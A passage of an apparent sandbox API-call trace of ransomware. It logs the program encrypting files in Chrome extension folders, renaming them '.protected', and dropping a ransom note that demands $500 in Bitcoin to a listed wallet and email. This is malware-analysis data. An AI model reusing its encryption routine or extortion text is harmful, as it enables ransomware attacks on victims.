secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.003] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0084.003] CloseHandle (hObject=0x164) returned 1 [0084.003] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0084.003] lstrcmpiW (lpString1="tr", lpString2="Windows") returned -1 [0084.003] lstrcmpiW (lpString1="tr", lpString2="Program Files") returned 1 [0084.003] lstrcmpiW (lpString1="tr", lpString2="Program Files (x86)") returned 1 [0084.003] lstrcmpiW (lpString1="tr", lpString2="$Recycle.bin") returned 1 [0084.003] lstrcmpiW (lpString1="tr", lpString2="System Volume Information") returned 1 [0084.003] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr") returned 150 [0084.003] lstrcmpW (lpString1="tr", lpString2=".") returned 1 [0084.003] lstrcmpW (lpString1="tr", lpString2="..") returned 1 [0084.003] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\*") returned 152 [0084.003] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0084.003] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.003] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.003] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.003] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.003] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.003] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\.") returned 152 [0084.003] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.003] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0084.003] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.003] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.003] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.003] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.003] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.003] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\..") returned 153 [0084.003] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.004] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.004] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0084.004] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0084.004] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0084.004] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0084.004] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0084.004] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0084.004] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json") returned 164 [0084.004] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0084.004] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0084.004] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0084.004] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0084.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0084.004] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json") returned 164 [0084.004] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0084.004] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json") returned 164 [0084.004] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0084.004] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json") returned 164 [0084.004] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0084.004] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.006] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.006] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.006] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.006] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0084.006] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0084.006] CloseHandle (hObject=0x168) returned 1 [0084.006] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.protected") returned 174 [0084.006] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.protected")) returned 1 [0084.007] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0084.007] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0084.007] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\RESTORE_FILES.txt") returned 168 [0084.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0084.007] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.007] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0084.008] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.008] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0084.008] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.008] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0084.008] CloseHandle (hObject=0x164) returned 1 [0084.008] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0084.008] lstrcmpiW (lpString1="uk", lpString2="Windows") returned -1 [0084.008] lstrcmpiW (lpString1="uk", lpString2="Program Files") returned 1 [0084.008] lstrcmpiW (lpString1="uk", lpString2="Program Files (x86)") returned 1 [0084.008] lstrcmpiW (lpString1="uk", lpString2="$Recycle.bin") returned 1 [0084.008] lstrcmpiW (lpString1="uk", lpString2="System Volume Information") returned 1 [0084.008] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk") returned 150 [0084.008] lstrcmpW (lpString1="uk", lpString2=".") returned 1 [0084.008] lstrcmpW (lpString1="uk", lpString2="..") returned 1 [0084.009] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\*") returned 152 [0084.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0084.009] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.009] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.009] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.009] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.009] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.009] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\.") returned 152 [0084.009] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.009] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0084.009] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.009] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.009] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.009] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.009] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.009] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\..") returned 153 [0084.009] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.009] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.009] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0084.009] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0084.009] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0084.009] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0084.009] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0084.009] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0084.009] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json") returned 164 [0084.009] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0084.009] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0084.009] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0084.009] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0084.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0084.010] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json") returned 164 [0084.010] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0084.010] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json") returned 164 [0084.010] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0084.010] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json") returned 164 [0084.010] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0084.010] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.012] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.012] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.012] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.012] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0084.012] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0084.012] CloseHandle (hObject=0x168) returned 1 [0084.012] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.protected") returned 174 [0084.012] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.protected")) returned 1 [0084.013] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0084.013] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0084.013] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\RESTORE_FILES.txt") returned 168 [0084.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0084.013] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.013] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0084.014] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.014] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0084.014] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write 